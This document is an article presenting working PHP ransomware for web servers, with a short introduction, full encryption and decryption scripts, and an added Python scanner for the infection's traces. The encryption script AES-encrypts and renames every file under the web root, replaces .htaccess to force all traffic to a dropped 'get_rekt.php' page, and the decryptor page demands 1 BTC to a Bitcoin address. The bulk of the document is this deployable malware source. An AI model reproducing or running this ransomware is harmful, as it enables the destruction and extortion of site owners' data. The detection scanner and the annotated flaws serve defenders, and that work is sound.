Ransomware for a database
Author: Ivan Šincek
Introduction
Ransomware is a type of malicious code from the field of cryptovirology that threatens users and businesses with publishing their sensitive data, or with continuing to block access to that data, unless the demanded ransom is paid. While amateur ransomware in most cases merely blocks access to the data, which is very easy to undo, advanced malware uses techniques such as cryptoviral extortion, in which every file is encrypted separately, rendering it useless, and a ransom is demanded to restore the files to their original form. In a well-designed cryptoviral extortion attack, restoring the data to its original form without the decryption key is practically impossible; likewise, the attack uses digital currencies such as Ukash and Bitcoin for the ransom payment, which makes tracing the attackers almost impossible.
Running the malicious code
Ransomware attacks are most often delivered as a Trojan horse: the malicious code is presented to the user as a legitimate file, which the user is tricked into downloading and running. The most common delivery medium is email. However, advanced ransomware can also be built into other malicious code such as worms (e.g. "WannaCry"), and can then travel through the network on its own without any user interaction.
In this project the ransomware's malicious code is contained in a single PHP file, which can be transferred to the server in various ways; its execution is manual, meaning that a user has to visit that PHP script for the malicious code to run.
Malicious code
Encryption and decryption are carried out by recursively scanning all directories and files inside the server's root directory only. Encryption reads the file's contents and, using a mathematical algorithm, computes encrypted (unintelligible) content from the intelligible content that was read. After the contents are encrypted, the file is renamed to a randomly generated string of characters, and the real file name is written inside the encrypted content itself so that it can be restored later. Decryption mirrors encryption: the unintelligible content is read, the inverse mathematical procedure computes the intelligible (original) content from it, and the file is renamed back to the real name stored inside the encrypted content.
During encryption, if a .htaccess file exists in the server's root directory, it is encrypted and renamed, and a malicious .htaccess file of the ransomware's own is created which redirects all traffic to a newly generated file, "get_rekt.php", which serves for decryption and contains all the information needed to pay the ransom. After the ransom is paid successfully, that is, after the correct decryption key is entered, the malicious .htaccess file together with the decryption file is deleted, the original .htaccess file is restored, and then all the other files.
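As an added, defender-side example that is not part of the project's code: a scanner that walks a web root looking for the traces the two scripts below leave behind. The indicator names (get_rekt.php, .get_rekt, the DirectoryIndex/ErrorDocument lines, and the rename pattern "first 128 characters of the base64 body followed by its first 3 characters again") come from the listings; the sample web root and its base64 bodies are constructed here, and a POSIX filesystem is assumed. It goes one step beyond the text: base64 output can contain '/', so the rename() in encryptFile() fails for many files, and the scanner therefore also flags files that keep their original name but whose whole body is a single base64 token.

```python
import os
import re
import tempfile

HTACCESS_RE = re.compile(r"^(DirectoryIndex|ErrorDocument 404)\s+get_rekt\.php\s*$", re.M)
B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")  # one base64 token, as base64_encode() emits it
def is_renamed_by_script(path):
    """Name equals substr(body, 0, 128) . substr(body, 0, 3): the script's rename() pattern."""
    name = os.path.basename(path)  # bodies are 4k chars (24 minimum), so names run 27..131
    if not 27 <= len(name) <= 131 or (len(name) - 3) % 4 or name[-3:] != name[:3]:
        return False
    with open(path, "rb") as fh:
        head = fh.read(128).decode("ascii", "replace")
    return name == head + head[:3]

def has_base64_body(path):
    """Whole file is one base64 token of length 4k; rename() fails on names containing '/'."""
    size = os.path.getsize(path)
    if size < 24 or size % 4:
        return False
    with open(path, "rb") as fh:
        return B64_RE.fullmatch(fh.read(4096)) is not None

def scan_webroot(root):
    """Walk the web root and return {indicator: sorted absolute paths}."""
    hits = {"dropped_file": [], "htaccess_redirect": [], "renamed_file": [], "encrypted_body": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name in ("get_rekt.php", ".get_rekt"):  # files the script writes into the web root
                hits["dropped_file"].append(path)
            elif name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if HTACCESS_RE.search(fh.read()):
                        hits["htaccess_redirect"].append(path)
            elif is_renamed_by_script(path):
                hits["renamed_file"].append(path)
            elif has_base64_body(path):
                hits["encrypted_body"].append(path)
    return {k: sorted(v) for k, v in hits.items()}

def build_demo_root():
    """Constructed sample web root (not a real infection): clean files plus the artifacts."""
    root = tempfile.mkdtemp(prefix="webroot_")
    def put(rel, data):  # write one constructed file under root
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(data)
    put("index.html", "<html>ok</html>")
    put(".htaccess", "DirectoryIndex get_rekt.php\nErrorDocument 404 get_rekt.php")
    put("get_rekt.php", "<?php /* stands in for the dropped decryptor */ ?>")
    big = "AbC" + "Q" * 149                    # 152-char body, longer than 128
    put(big[:128] + big[:3], big)              # name: first 128 chars + first 3 again
    put("QUJD" * 6 + "QUJ", "QUJD" * 6)        # 24-char body (one AES block): name is body + 3
    put("logo.png", "QUJD" * 10)               # encrypted body whose rename failed
    return root
```

Run scan_webroot() against a copy of the suspect web root; a hit in any category other than "encrypted_body" alone is specific to this script, while "encrypted_body" on its own needs a look at the file since legitimate base64 files match it too.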
Ransomware encryption
<?php
class RansomwareEncrypt {
    // Swaps the site's .htaccess for one that sends every request to the dropped
    // decryptor page. The original .htaccess is kept under the name ".get_rekt";
    // because encryptFile() skips only ".htaccess" and "get_rekt.php", that renamed
    // copy is itself encrypted along with the rest of the web root.
    // (Declared static: the class only ever calls these helpers via self:: from encrypt().)
    private static function htaccessEncrypt() {
        if (file_exists($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess')) {
            rename(
                $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess',
                $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.get_rekt'
            );
        }
        // The decryptor page is embedded as a single base64 string (elided here; its
        // decoded form is the "Ransomware decryption" script listed below).
        file_put_contents(
            $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php',
            base64_decode('<base64-encoded decryption script, elided>')
        );
        file_put_contents(
            $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess',
            "DirectoryIndex get_rekt.php\nErrorDocument 404 get_rekt.php"
        );
    }

    // Encrypts one file in place and renames it. The AES key is the hex SHA-256 digest of
    // the entered key and the IV is the first 16 hex characters of SHA-256 of that digest,
    // so key and IV are the same for every file. The original path is stored in the
    // plaintext ahead of a "<fileName>" marker so that decryption can restore it.
    private static function encryptFile($file, $key) {
        if ($file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess'
            && $file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php') {
            $text = file_get_contents($file);
            $key = hash('sha256', $key);
            $iv = substr(hash('sha256', $key), 0, 16);
            $encryptedText = base64_encode(openssl_encrypt($file . '<fileName>' . $text, 'AES-256-CBC', $key, 0, $iv));
            file_put_contents($file, $encryptedText);
            // New name: the first 128 characters of the base64 ciphertext followed by its
            // first 3 characters again. Base64 may contain '/', in which case the target path
            // points into a directory that does not exist, rename() fails, and the file keeps
            // its original name while holding the encrypted body.
            rename(
                $file,
                pathinfo($file)['dirname'] . DIRECTORY_SEPARATOR . substr($encryptedText, 0, 128) . substr($encryptedText, 0, 3)
            );
        }
    }

    // Recursive walk from $dir; the .htaccess swap happens only at the top-level call.
    static function encrypt($dir, $key, $htaccess = false) {
        if ($htaccess) {
            self::htaccessEncrypt();
        }
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . DIRECTORY_SEPARATOR . $file)) {
                self::encrypt($dir . DIRECTORY_SEPARATOR . $file, $key);
            } else {
                self::encryptFile($dir . DIRECTORY_SEPARATOR . $file, $key);
            }
        }
    }
}

$errorMessages = array(
    'key' => ''
);
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post') {
    if (isset($_POST['submit']) && isset($_POST['key'])) {
        $parameters = array(
            'key' => trim($_POST['key'])
        );
        $error = false;
        if (mb_strlen($parameters['key']) < 1) {
            $errorMessages['key'] = 'Please enter encryption key';
            $error = true;
        }
        if (!$error) {
            RansomwareEncrypt::encrypt($_SERVER['DOCUMENT_ROOT'], $parameters['key'], true);
            header('Location: /');
            exit();
        }
    }
}
?>
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Ransomware</title>
        <meta name="description" content="">
        <meta name="keywords" content="">
        <meta name="author" content="Ivan Šincek">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
            html { height: 100%; }
            body { background-color: #262626; display: flex; flex-direction: column; height: inherit; margin: 0; color: #FFF; font-family: Arial, Helvetica, sans-serif; font-size: 1em; font-weight: 400; text-align: left; }
            .form { display: flex; flex-direction: column; align-items: center; justify-content: center; flex: 1 0 auto; padding: .5em; }
            .form .layout { background-color: #DCDCDC; padding: 1.5em; width: 24em; color: #000; border: .07em solid #000; }
            .form .layout header h1 { margin: 0 0 .5em 0; font-size: 2.6em; font-weight: 400; text-align: center; }
            .form .layout form { display: flex; flex-direction: column; }
            .form .layout form label { margin: 0 0 .1em; }
            .form .layout form input { -webkit-appearance: none; margin: 0; padding: .2em .4em; font-family: 'Armata', sans-serif; font-size: 1em; border: .07em solid #9D2A00; -webkit-border-radius: 0; }
            .form .layout form input[type="submit"] { background-color: #FF4500; color: #FFF; cursor: pointer; transition: background-color 220ms linear; }
            .form .layout form input[type="submit"]:hover { background-color: #D83A00; transition: background-color 220ms linear; }
            .form .layout form .error { margin: 0 0 1em; color: #9D2A00; font-size: .8em; }
            .form .layout form .error:not(:empty) { margin: .2em 0 1em; }
        </style>
    </head>
    <body>
        <div class="form">
            <div class="layout">
                <header>
                    <h1>Ransomware</h1>
                </header>
                <form method="post" action="">
                    <label for="key">Encryption Key</label>
                    <input name="key" id="key" type="text" spellcheck="false" autofocus="autofocus">
                    <p class="error"><?php echo $errorMessages['key']; ?></p>
                    <input name="submit" type="submit" value="Encrypt">
                </form>
            </div>
        </div>
    </body>
</html>
Ransomware decryption
<?php
class RansomwareDecrypt {
    // Removes the redirecting .htaccess and this decryptor page, then puts the original
    // .htaccess back. It runs last (see decrypt()), after the walk has already decrypted
    // the renamed copy back to ".get_rekt".
    // (Declared static: the class only ever calls these helpers via self:: from decrypt().)
    private static function htaccessDecrypt() {
        unlink($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess');
        unlink($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php');
        if (file_exists($_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.get_rekt')) {
            rename(
                $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.get_rekt',
                $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess'
            );
        }
    }

    // Reverses encryptFile(): same key and IV derivation, then the plaintext is split at
    // the "<fileName>" marker into the original path and the original contents.
    // Caveat for responders: with a wrong key openssl_decrypt() returns false, the split
    // yields empty strings and file_put_contents() overwrites the file with empty (or, if
    // the padding happens to validate, garbage) content, so keys must only ever be tried
    // against a copy of the web root.
    private static function decryptFile($file, $key) {
        if ($file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . '.htaccess'
            && $file != $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'get_rekt.php') {
            $text = base64_decode(file_get_contents($file));
            $key = hash('sha256', $key);
            $iv = substr(hash('sha256', $key), 0, 16);
            $decryptedText = openssl_decrypt($text, 'AES-256-CBC', $key, 0, $iv);
            $position = strpos($decryptedText, '<fileName>');
            $fileName = substr($decryptedText, 0, $position);
            $decryptedText = substr($decryptedText, $position + strlen('<fileName>'));
            file_put_contents($file, $decryptedText);
            rename($file, $fileName);
        }
    }

    // Recursive walk from $dir; the .htaccess restore happens only at the top-level call,
    // after every file has been processed.
    static function decrypt($dir, $key, $htaccess = false) {
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . DIRECTORY_SEPARATOR . $file)) {
                self::decrypt($dir . DIRECTORY_SEPARATOR . $file, $key);
            } else {
                self::decryptFile($dir . DIRECTORY_SEPARATOR . $file, $key);
            }
        }
        if ($htaccess) {
            self::htaccessDecrypt();
        }
    }
}

$errorMessages = array(
    'key' => ''
);
if (isset($_SERVER['REQUEST_METHOD']) && strtolower($_SERVER['REQUEST_METHOD']) === 'post') {
    if (isset($_POST['submit']) && isset($_POST['key'])) {
        $parameters = array(
            'key' => trim($_POST['key'])
        );
        $error = false;
        if (mb_strlen($parameters['key']) < 1) {
            $errorMessages['key'] = 'Please enter decryption key';
            $error = true;
        }
        if (!$error) {
            RansomwareDecrypt::decrypt($_SERVER['DOCUMENT_ROOT'], $parameters['key'], true);
            header('Location: /');
            exit();
        }
    }
}
?>
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Ransomware</title>
        <meta name="description" content="">
        <meta name="keywords" content="">
        <meta name="author" content="Ivan Šincek">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style>
            html { height: 100%; }
            body { background-color: #262626; display: flex; flex-direction: column; height: inherit; margin: 0; color: #FFF; font-family: Arial, Helvetica, sans-serif; font-size: 1em; font-weight: 400; text-align: left; }
            .form { display: flex; flex-direction: column; align-items: center; justify-content: center; flex: 1 0 auto; padding: .5em; }
            .form .layout { background-color: #DCDCDC; padding: 1.5em; width: 24em; color: #000; border: .07em solid #000; }
            .form .layout header h1 { margin: 0 0 .5em 0; font-size: 2.6em; font-weight: 400; text-align: center; }
            .form .layout form { display: flex; flex-direction: column; }
            .form .layout form label { margin: 0 0 .1em; }
            .form .layout form input { -webkit-appearance: none; margin: 0; padding: .2em .4em; font-family: 'Armata', sans-serif; font-size: 1em; border: .07em solid #9D2A00; -webkit-border-radius: 0; }
            .form .layout form input[type="submit"] { background-color: #FF4500; color: #FFF; cursor: pointer; transition: background-color 220ms linear; }
            .form .layout form input[type="submit"]:hover { background-color: #D83A00; transition: background-color 220ms linear; }
            .form .layout form .error { margin: 0 0 1em; color: #9D2A00; font-size: .8em; }
            .form .layout form .error:not(:empty) { margin: .2em 0 1em; }
            .form .pay { background-color: rgba(0, 0, 0, .7); display: flex; flex-direction: column; align-items: center; position: absolute; bottom: 0; left: 0; padding: .2em; width: 225px; }
            .form .pay img { margin: 0 0 .2em; width: inherit; }
            .form .pay p { margin: 0; color: #FFF; }
        </style>
    </head>
    <body>
        <div class="form">
            <div class="pay">
                <img src="https://chart.googleapis.com/chart?chs=225x225&chld=L|2&cht=qr&chl=bitcoin:1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14?amount=1" alt="1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14">
                <p>Pay 1 BTC!</p>
            </div>
            <div class="layout">
                <header>
                    <h1>Ransomware</h1>
                </header>
                <form method="post" action="">
                    <label for="key">Decryption Key</label>
                    <input name="key" id="key" type="text" spellcheck="false" autofocus="autofocus">
                    <p class="error"><?php echo $errorMessages['key']; ?></p>
                    <input name="submit" type="submit" value="Decrypt">
                </form>
            </div>
        </div>
    </body>
</html>